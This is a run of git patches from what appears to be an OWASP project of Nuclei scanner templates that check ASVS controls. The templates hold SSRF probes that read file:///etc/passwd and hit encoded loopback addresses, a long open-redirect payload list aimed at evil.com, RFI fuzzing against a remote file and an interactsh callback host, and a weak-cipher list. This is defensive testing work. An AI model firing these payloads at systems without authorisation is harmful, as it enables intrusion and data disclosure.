'0x7f.0x0.0.1' + - '0x7f.0x0.0x0.0x1' + - '0x7f.0x0.0x0.1' + - '0x7f.0x0.1' + - '0x7f.1' + - '0x7f000001' + - '127.0.0.01' + - '127.0.0.0x1' + - '127.0.0x0.0x1' + - '127.0x0.0x0.0x1' + - '2130706433' + + + stop-at-first-match: true + matchers: + + - type: word + words: + - "{{restricted_path_keyword}}" From 6d1d1d0224546aed4cde7a5b41a6318df2923aa5 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Thu, 18 Apr 2024 06:19:32 +0000 Subject: [PATCH 090/129] fix template validation action --- templates/12.6.1.yaml | 15 ++++++--------- 1 file changed, 6 insertions(+), 9 deletions(-) diff --git a/templates/12.6.1.yaml b/templates/12.6.1.yaml index 7f94aa6..bc6f561 100644 --- a/templates/12.6.1.yaml +++ b/templates/12.6.1.yaml @@ -3,7 +3,7 @@ id: ASVS-4-0-3-V12-6-1 info: name: ASVS 12.6.1 Check author: AmirHossein Raeisi - severity: high + severity: high classification: cwe-id: CWE-918 reference: @@ -14,13 +14,12 @@ info: description: | Verify that the web or application server is configured with an allow list of resources or systems to which the server can send requests or load data/files from. -variables: +variables: whiltelist_host: "http://google.com" server_file: "file:///etc/passwd" - restricted_path: "/admin" + restricted_path: "/admin" restricted_path_keyword: "Welcom to Admin Panel" - requests: - raw: - | @@ -35,7 +34,7 @@ requests: - type: regex regex: - "root:[x*]:0:0:" - + - raw: - | POST {{BaseURL}} HTTP/1.1 @@ -50,7 +49,7 @@ requests: Content-Type: application/json {"url":"{{whiltelist_host}}.{{interactsh-url}}"} - + - | POST {{BaseURL}} HTTP/1.1 Host: {{Hostname}} @@ -73,7 +72,6 @@ requests: - "http" - "dns" - - raw: - | POST {{BaseURL}} HTTP/1.1 @@ -108,10 +106,9 @@ requests: - '127.0x0.0x0.0x1' - '2130706433' - stop-at-first-match: true matchers: - type: word words: - - "{{restricted_path_keyword}}" + - "{{restricted_path_keyword}}" \ No newline at end of file From 43eeccbd60e3b79e30d735866ecb99d06a30764c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 20 Apr 2024 08:38:03 +0000 Subject: [PATCH 091/129] Vulnerable Page Updated. --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 266f974..3f08db3 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 266f9741658e1da4ac76d42e5121f0721063070c +Subproject commit 3f08db358ce0af06e2c142a87f448fe1e3cafc1a From 66460bf1f253fa6a2e71b3cb3f9336791dde24b4 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sat, 20 Apr 2024 08:42:37 +0000 Subject: [PATCH 092/129] Fix status badge --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index 96dbdc2..ad75d32 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F&label=🎯Vulnerable%20Pages&url=https%3A%2F%2Fsnbig.github.io%2FVulnerable-Pages%2F)](https://snbig.github.io/Vulnerable-Pages/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://spotless-frog-wetsuit.cyclic.cloud/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://spotless-frog-wetsuit.cyclic.cloud/)](https://spotless-frog-wetsuit.cyclic.cloud/) # OWASP ASVS Security Evaluation Templates with Nuclei From 7df30c6c2cfbbd6d0043ca506137c3b6e47f13ca Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Mon, 29 Apr 2024 05:21:39 +0000 Subject: [PATCH 093/129] Update Submodule --- README.md | 2 +- Vulnerable-Pages | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ad75d32..0b0a00e 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ [![❄️ YAML Lint](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/syntax-checking.yml) [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) -[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://spotless-frog-wetsuit.cyclic.cloud/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://spotless-frog-wetsuit.cyclic.cloud/)](https://spotless-frog-wetsuit.cyclic.cloud/) +[![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) # OWASP ASVS Security Evaluation Templates with Nuclei diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 3f08db3..156d51d 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 3f08db358ce0af06e2c142a87f448fe1e3cafc1a +Subproject commit 156d51de7c29edffa27f9ef0fd341a668f965fd8 From 198f60a068336cfee86945e23a12ff62ba24796a Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 07:47:31 +0000 Subject: [PATCH 094/129] Create 5.1.5.yaml --- templates/5.1.5.yaml | 138 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 138 insertions(+) create mode 100644 templates/5.1.5.yaml diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml new file mode 100644 index 0000000..d5d33f9 --- /dev/null +++ b/templates/5.1.5.yaml @@ -0,0 +1,138 @@ +id: ASVS-4-0-3-V5-1-5 + +info: + name: ASVS 5.1.5 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-601 + reference: + - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html + - https://cwe.mitre.org/data/definitions/601.html + - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + tags: asvs,5.1.5 + description: | + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + +variables: + vulnerable_parameter: "url" + +http: + - method: GET + path: + - "{{BaseURL}}/{{payload}}" + - "{{BaseURL}}//{{payload}}" + - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" + + payloads: + payload: + - '%0a/evil.com/' + - '%0d/evil.com/' + - '%00/evil.com/' + - '%09/evil.com/' + - '%5C%5Cevil.com/%252e%252e%252f' + - '%5Cevil.com' + - '%5cevil.com/%2f%2e%2e' + - '%5c{{RootURL}}evil.com/%2f%2e%2e' + - '../evil.com' + - '.evil.com' + - '/%5cevil.com' + - '////\;@evil.com' + - '////evil.com' + - '///evil.com' + - '///evil.com/%2f%2e%2e' + - '///evil.com@//' + - '///{{RootURL}}evil.com/%2f%2e%2e' + - '//;@evil.com' + - '//\/evil.com/' + - '//\@evil.com' + - '//\evil.com' + - '//\tevil.com/' + - '//evil.com/%2F..' + - '//evil.com//' + - '//%69%6e%74%65%72%61%63%74%2e%73%68' + - '//evil.com@//' + - '//evil.com\tevil.com/' + - '//https://evil.com@//' + - '/<>//evil.com' + - '/\/\/evil.com/' + - '/\/evil.com' + - '/\evil.com' + - '/evil.com' + - '/evil.com/%2F..' + - '/evil.com/' + - '/evil.com/..;/css' + - '/https:evil.com' + - '/{{RootURL}}evil.com/' + - '/〱evil.com' + - '/〵evil.com' + - '/ゝevil.com' + - '/ーevil.com' + - '/ーevil.com' + - '<>//evil.com' + - '@evil.com' + - '@https://evil.com' + - '\/\/evil.com/' + - 'evil%E3%80%82com' + - 'evil.com' + - 'evil.com/' + - 'evil.com//' + - 'evil.com;@' + - 'https%3a%2f%2fevil.com%2f' + - 'https:%0a%0devil.com' + - 'https://%0a%0devil.com' + - 'https://%09/evil.com' + - 'https://%2f%2f.evil.com/' + - 'https://%3F.evil.com/' + - 'https://%5c%5c.evil.com/' + - 'https://%5cevil.com@' + - 'https://%23.evil.com/' + - 'https://.evil.com' + - 'https://////evil.com' + - 'https:///evil.com' + - 'https:///evil.com/%2e%2e' + - 'https:///evil.com/%2f%2e%2e' + - 'https:///evil.com@evil.com/%2e%2e' + - 'https:///evil.com@evil.com/%2f%2e%2e' + - 'https://:80#@evil.com/' + - 'https://:80?@evil.com/' + - 'https://:@\@evil.com' + - 'https://:@evil.com\@evil.com' + - 'https://;@evil.com' + - 'https://\tevil.com/' + - 'https://evil.com/evil.com' + - 'https://evil.com/https://evil.com/' + - 'https://www.\.evil.com' + - 'https:/\/\evil.com' + - 'https:/\evil.com' + - 'https:/evil.com' + - 'https:evil.com' + - '{{RootURL}}evil.com' + - '〱evil.com' + - '〵evil.com' + - 'ゝevil.com' + - 'ーevil.com' + - 'ーevil.com' + - 'redirect/evil.com' + - 'cgi-bin/redirect.cgi?evil.com' + - 'out?evil.com' + - 'login?to=http://evil.com' + - '1/_https@evil.com' + - 'redirect?targeturl=https://evil.com' + + redirects: false + matchers-condition: and + stop-at-first-match: true + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)evil\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/idfD2e/1 + - type: status + status: + - 301 + - 302 + - 303 + - 304 + - 307 + - 308 \ No newline at end of file From 9940e4ef7d9af7de4e2f5395ced219b13dcf58f8 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 13:08:12 +0000 Subject: [PATCH 095/129] fix 5.1.5.yaml --- templates/5.1.5.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index d5d33f9..43c6585 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -10,9 +10,11 @@ info: - https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html - https://cwe.mitre.org/data/definitions/601.html - https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/11-Client_Side_Testing/04-Testing_for_Client_Side_URL_Redirect + - https://github.com/projectdiscovery/nuclei-templates/blob/main/http/vulnerabilities/generic/open-redirect-generic.yaml + - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 description: | - Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. variables: vulnerable_parameter: "url" @@ -23,7 +25,8 @@ http: - "{{BaseURL}}/{{payload}}" - "{{BaseURL}}//{{payload}}" - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" - + - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" + payloads: payload: - '%0a/evil.com/' @@ -135,4 +138,4 @@ http: - 303 - 304 - 307 - - 308 \ No newline at end of file + - 308 From 49689c1d6e80db14fbbd40c351debd46aca40261 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 13 May 2024 13:15:08 +0000 Subject: [PATCH 096/129] fix template validation action --- templates/5.1.5.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/templates/5.1.5.yaml b/templates/5.1.5.yaml index 43c6585..0942052 100644 --- a/templates/5.1.5.yaml +++ b/templates/5.1.5.yaml @@ -14,7 +14,7 @@ info: - https://snbig.github.io/Vulnerable-Pages/ASVS_5_1_5/ tags: asvs,5.1.5 description: | - Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. + Verify that URL redirects and forwards only allow destinations which appear on an allow list, or show a warning when redirecting to potentially untrusted content. variables: vulnerable_parameter: "url" @@ -26,7 +26,7 @@ http: - "{{BaseURL}}//{{payload}}" - "{{BaseURL}}/?{{vulnerable_parameter}}={{payload}}" - "{{BaseURL}}?{{vulnerable_parameter}}={{payload}}" - + payloads: payload: - '%0a/evil.com/' From d049f244ebf1b86ab345c227b546d6244b9dd5b5 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 14:44:02 +0000 Subject: [PATCH 097/129] Create 8.2.1.yaml --- templates/8.2.1.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 templates/8.2.1.yaml diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml new file mode 100644 index 0000000..c43ca5b --- /dev/null +++ b/templates/8.2.1.yaml @@ -0,0 +1,33 @@ +id: ASVS-4-0-3-V8-2-1 + +info: + name: ASVS 8.2.1 Check + author: AmirHossein Raeisi + severity: low + classification: + cwe-id: CWE-525 + reference: + - https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses + - https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control + tags: asvs,8.2.1 + description: | + Verify the application sets sufficient anti-caching headers so that sensitive data is not cached in modern browsers. + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: header + regex: + - '(?i)cache-control:.*no-store' + negative: true + + - type: Word + part: header + words: + - "Last-Modified" + - "Expires" + - "Pragma" From 900de252c21221861ce00e1d8a26f8ca87b0fde0 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 15:41:25 +0000 Subject: [PATCH 098/129] Update 8.2.1.yaml --- templates/8.2.1.yaml | 9 +-------- 1 file changed, 1 insertion(+), 8 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index c43ca5b..eeff462 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml @@ -23,11 +23,4 @@ http: part: header regex: - '(?i)cache-control:.*no-store' - negative: true - - - type: Word - part: header - words: - - "Last-Modified" - - "Expires" - - "Pragma" + negative: true \ No newline at end of file From 39995074ab9af5a1b607596e1be8d024190d7d01 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Fri, 31 May 2024 17:49:45 +0000 Subject: [PATCH 099/129] Update 8.2.1.yaml --- templates/8.2.1.yaml | 51 ++++++++++++++++++++++++++++++++++++++++++-- 1 file changed, 49 insertions(+), 2 deletions(-) diff --git a/templates/8.2.1.yaml b/templates/8.2.1.yaml index eeff462..0ec2564 100644 --- a/templates/8.2.1.yaml +++ b/templates/8.2.1.yaml @@ -16,11 +16,58 @@ info: http: - method: GET path: - - "{{BaseURL}}" + - "{{BaseURL}}{{sensitive_path}}" + payloads: + sensitive_path: + - "/" + - "/login" + - "/logout" + - "/register" + - "/dashboard" + - "/profile" + - "/settings" + - "/account" + - "/admin" + - "/user" + - "/users" + - "/search" + - "/messages" + - "/notifications" + - "/help" + - "/support" + - "/contact" + - "/about" + - "/privacy" + - "/terms" + - "/docs" + - "/api" + - "/api/v1" + - "/api/v2" + - "/home" + - "/welcome" + - "/password-reset" + - "/forgot-password" + - "/update-profile" + - "/billing" + - "/invoices" + - "/orders" + - "/cart" + - "/checkout" + - "/confirmation" + - "/history" + - "/activities" + matchers-condition: and + stop-at-first-match: true matchers: - type: regex part: header regex: - '(?i)cache-control:.*no-store' - negative: true \ No newline at end of file + negative: true + + - type: status + status: + - 200 + - 301 + - 302 \ No newline at end of file From 41b467935d958acc696dee00805bbf02bdd4e70c Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Sun, 9 Jun 2024 08:51:21 +0330 Subject: [PATCH 100/129] Add logo README.md Signed-off-by: Hamed Salimian --- README.md | 1 + 1 file changed, 1 insertion(+) diff --git a/README.md b/README.md index 0b0a00e..2e7bdab 100644 --- a/README.md +++ b/README.md @@ -2,6 +2,7 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) +![Screenshot_2024-06-09_083924-transformed-removebg-preview](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/assets/30114463/2ec10a7f-e3c3-4e56-b4d1-07a48bbf8c0f) # OWASP ASVS Security Evaluation Templates with Nuclei From 7fce6174378105f7d437146ef8dac4d0dc177157 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Tue, 2 Jul 2024 13:11:47 +0000 Subject: [PATCH 101/129] Update Submodule --- Vulnerable-Pages | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Vulnerable-Pages b/Vulnerable-Pages index 156d51d..7457167 160000 --- a/Vulnerable-Pages +++ b/Vulnerable-Pages @@ -1 +1 @@ -Subproject commit 156d51de7c29edffa27f9ef0fd341a668f965fd8 +Subproject commit 74571678dbdfb39620454cde42d2054eb2a858db From c484d26e0aa38d30b54a924ee1a1456710353997 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Mon, 15 Jul 2024 21:02:57 +0000 Subject: [PATCH 102/129] Create 12.3.3.yaml --- templates/dast/12.3.3.yaml | 46 ++++++++++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 templates/dast/12.3.3.yaml diff --git a/templates/dast/12.3.3.yaml b/templates/dast/12.3.3.yaml new file mode 100644 index 0000000..cd40bb0 --- /dev/null +++ b/templates/dast/12.3.3.yaml @@ -0,0 +1,46 @@ +id: ASVS-4-0-3-V12-3-3 + +info: + name: ASVS 12.3.3 Check + author: AmirHossein Raeisi + severity: high + classification: + cwe-id: CWE-918, CWE-98 + reference: + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion + - https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/19-Testing_for_Server-Side_Request_Forgery + + tags: asvs,12.3.3 + + description: | + Verify that user-submitted filename metadata is validated or ignored to prevent the disclosure or execution of remote files via Remote File Inclusion (RFI) or Server-side Request Forgery (SSRF) attacks. + +http: + - pre-condition: + - type: dsl + dsl: + - 'method == "GET"' + + payloads: + rfi: + - "https://snbig.github.io/Vulnerable-Pages/ASVS_12_3_3/rfi.txt" + - "https://{{interactsh-url}}" + + fuzzing: + - part: query + mode: single + fuzz: + - "{{rfi}}" + + stop-at-first-match: true + matchers: + - type: word + part: body + words: + - "d5b82f27-b7a4-4c3e-8b6e-88fd9e97b16a" + + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" \ No newline at end of file From d90123d15b5cea2e91aba00eff39c0b85a8d87b7 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 17 Jul 2024 13:38:14 +0330 Subject: [PATCH 103/129] Add LOGO README.md Signed-off-by: Hamed Salimian --- README.md | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/README.md b/README.md index 2e7bdab..d3023b1 100644 --- a/README.md +++ b/README.md @@ -2,7 +2,8 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -![Screenshot_2024-06-09_083924-transformed-removebg-preview](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/assets/30114463/2ec10a7f-e3c3-4e56-b4d1-07a48bbf8c0f) +![LOGO](https://github.com/user-attachments/assets/8f0b666e-a54c-45e9-9f33-4fa414fb122e) + # OWASP ASVS Security Evaluation Templates with Nuclei From bbdeae8a42c17d6759d4ac724cb3a953f628b6a6 Mon Sep 17 00:00:00 2001 From: Hamed Salimian Date: Wed, 17 Jul 2024 13:49:17 +0330 Subject: [PATCH 104/129] Fix logo alignment Signed-off-by: Hamed Salimian --- README.md | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d3023b1..5c93c84 100644 --- a/README.md +++ b/README.md @@ -2,8 +2,9 @@ [![🛠 Template Validate](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml/badge.svg)](https://github.com/OWASP/www-project-asvs-security-evaluation-templates-with-nuclei/actions/workflows/template-validate.yml) [![Vulnerable Pages](https://img.shields.io/website?labelColor=3D444C&link=https://vulnerable-pages.onrender.com/&label=%F0%9F%8E%AFVulnerable%20Pages&url=https://vulnerable-pages.onrender.com/)](https://vulnerable-pages.onrender.com/) -![LOGO](https://github.com/user-attachments/assets/8f0b666e-a54c-45e9-9f33-4fa414fb122e) - +

+ +

# OWASP ASVS Security Evaluation Templates with Nuclei From cb091adb96e56c0d069e01f37fd55bac42b36de6 Mon Sep 17 00:00:00 2001 From: AmirHossein Raeisi <96957814+Ahsraeisi@users.noreply.github.com> Date: Wed, 17 Jul 2024 19:32:13 +0000 Subject: [PATCH 105/129] Create 9.1.2.yaml --- templates/9.1.2.yaml | 423 +++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 423 insertions(+) create mode 100644 templates/9.1.2.yaml diff --git a/templates/9.1.2.yaml b/templates/9.1.2.yaml new file mode 100644 index 0000000..ef748c2 --- /dev/null +++ b/templates/9.1.2.yaml @@ -0,0 +1,423 @@ +id: ASVS-4-0-3-V9-1-2 + +info: + name: ASVS 9.1.2 Check + author: AmirHossein Raeisi + severity: Low + classification: + cwe-id: CWE-918 + reference: + - https://www.acunetix.com/vulnerabilities/web/tls-ssl-weak-cipher-suites/ + - https://github.com/projectdiscovery/nuclei-templates/blob/main/ssl/insecure-cipher-suite-detect.yaml + tags: asvs,9.1.2 + description: | + Verify using up to date TLS testing tools that only strong cipher suites are enabled, with the strongest cipher suites set as preferred. + +ssl: + - address: "{{Host}}:{{Port}}" + min_version: tls10 + max_version: tls10 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - "TLS_RSA_WITH_RC4_128_MD5" + - "TLS_SM4_CCM_SM3" + - "TLS_DH_anon_WITH_CAMELLIA_256_GCM_SHA384" + - "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_ECDH_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5" + - "TLS_RSA_PSK_WITH_RC4_128_SHA" + - "TLS_GOSTR341112_256_WITH_MAGMA_CTR_OMAC" + - "TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_256_GCM_SHA384" + - "TLS_DHE_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_RC4_128_SHA" + - "TLS_PSK_WITH_RC4_128_SHA" + - "TLS_DHE_PSK_WITH_RC4_128_SHA" + - "TLS_KRB5_WITH_DES_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256" + - "TLS_PSK_WITH_NULL_SHA" + - "TLS_RSA_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_RC4_128_MD5" + - "TLS_ECDHE_ECDSA_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256" + - "TLS_RSA_WITH_NULL_MD5" + - "TLS_SHA384_SHA384" + - "TLS_SHA256_SHA256" + - "TLS_DH_anon_WITH_AES_256_GCM_SHA384" + - "TLS_RSA_WITH_NULL_SHA256" + - "TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA" + - "TLS_RSA_WITH_DES_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA" + - "TLS_PSK_WITH_NULL_SHA384" + - "TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_RC4_128_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA" + - "TLS_DHE_PSK_WITH_NULL_SHA" + - "TLS_DH_anon_WITH_ARIA_256_CBC_SHA384" + - "TLS_DH_anon_WITH_DES_CBC_SHA" + - "TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DH_anon_WITH_SEED_CBC_SHA" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA256" + - "TLS_DHE_DSS_WITH_DES_CBC_SHA" + - "TLS_PSK_WITH_NULL_SHA256" + - "TLS_ECDH_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_AES_128_CBC_SHA" + - "TLS_ECDHE_PSK_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_NULL_SHA" + - "TLS_ECDH_anon_WITH_AES_256_CBC_SHA" + - "TLS_KRB5_WITH_IDEA_CBC_MD5" + - "TLS_GOSTR341112_256_WITH_KUZNYECHIK_CTR_OMAC" + - "TLS_ECDHE_RSA_WITH_NULL_SHA" + - "TLS_GOSTR341112_256_WITH_28147_CNT_IMIT" + - "TLS_RSA_PSK_WITH_NULL_SHA" + - "TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_KRB5_WITH_DES_CBC_MD5" + - "TLS_KRB5_EXPORT_WITH_RC4_40_SHA" + - "TLS_DH_anon_WITH_ARIA_128_GCM_SHA256" + - "TLS_SM4_GCM_SM3" + - "TLS_ECDHE_PSK_WITH_NULL_SHA384" + - "TLS_ECDHE_ECDSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_KRB5_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_3DES_EDE_CBC_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA256" + - "TLS_ECDHE_PSK_WITH_NULL_SHA256" + - "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_RSA_WITH_DES_CBC_SHA" + - "TLS_ECDHE_RSA_WITH_RC4_128_SHA" + - "TLS_ECDH_anon_WITH_RC4_128_SHA" + - "TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA" + - "TLS_DHE_RSA_WITH_DES_CBC_SHA" + - "TLS_RSA_WITH_RC4_128_SHA" + - "TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5" + - "TLS_DH_anon_WITH_AES_128_CBC_SHA256" + - "TLS_DH_anon_WITH_CAMELLIA_128_GCM_SHA256" + - "TLS_ECDH_ECDSA_WITH_NULL_SHA" + - "TLS_RSA_PSK_WITH_NULL_SHA384" + - "TLS_KRB5_WITH_3DES_EDE_CBC_MD5" + - "TLS_KRB5_WITH_RC4_128_SHA" + - "TLS_RSA_WITH_NULL_SHA" + condition: or + + - address: "{{Host}}:{{Port}}" + min_version: tls11 + max_version: tls11 + + extractors: + - type: dsl + dsl: + - "tls_version, cipher" + matchers: + - type: word + part: cipher + words: + - "TLS_DHE_PSK_WITH_NULL_SHA384" + - "TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA" + - "TLS_DH_anon_WITH_AES_128_GCM_SHA256" + - "TLS_NULL_WITH_NULL_NULL" + - "TLS_DH_DSS_WITH_DES_CBC_SHA" + - "TLS_ECDH_RSA_WITH_NULL_SHA" + - "TLS_DH_anon_EXPORT_WITH_RC4_40_MD5" + - "TLS_DH_anon_WITH_AES_256_CBC_SHA" + - "TLS_DH_anon_WITH_ARIA_128_CBC_SHA256" + - 